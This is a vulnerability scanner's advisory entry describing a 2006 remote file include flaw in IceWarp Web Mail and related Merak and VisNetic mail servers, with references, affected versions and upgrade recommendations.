| VID |
21939 |
| Severity |
40 |
| Port |
32000, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The IceWarp Web Mail server is vulnerable to remote file include attacks via the 'lang_settings' parameter. IceWarp Web Mail is a multi-featured Web mail server for Microsoft Windows platforms. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Web Mail into their suites. Merak Mail Server version 8.3.8r with IceWarp Web Mail versions prior to 5.6.1 and VisNetic MailServer versions prior to 8.5.0.5 could allow a remote attacker to include malicious PHP files, caused by improper validation of user-supplied input passed to the 'lang_settings' parameter of the 'accounts/inc/include.php' and 'admin/inc/include.php' scripts. A remote attacker could send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References:
http://secunia.com/secunia_research/2006-12/advisory/
http://secunia.com/secunia_research/2006-14/advisory/
http://secunia.com/advisories/18953/
http://secunia.com/advisories/18966/
http://securitytracker.com/alerts/2006/Jul/1016513.html
* Platforms Affected:
Deerfield, VisNetic Mail Server 8.3.5
IceWarp Software, IceWarp Web Mail 5.6.0
Merak Mail Server, Inc., Merak Mail Server 8.3.8.r
Microsoft Windows Any version |
| Recommendation |
For Merak Mail Server:
Upgrade to the latest version of MERAK Mail Server (8.3.8.r or later), available from the Merak Mail Server Web site at http://www.merakmailserver.com/Products/Merak_Mail_Server/
For Visnetic Mail Server:
Upgrade to the latest version of Visnetic Mail Server (8.5.0.5 or later), available from the Visnetic Mail Server Web site at http://www.deerfield.net/products/visnetic-mailserver/vmstoiw.htm/
For IceWarp Web Mail:
Upgrade to the latest version of IceWarp Web Mail (5.6.1 or later), available from the IceWarp Web Mail Web site at http://www.icewarp.com/Products/IceWarp_Web_Mail/ |
| Related URL |
CVE-2006-0817,CVE-2006-0818 (CVE) |
| Related URL |
19002,19007 (SecurityFocus) |
| Related URL |
27773,27780 (ISS) |
|
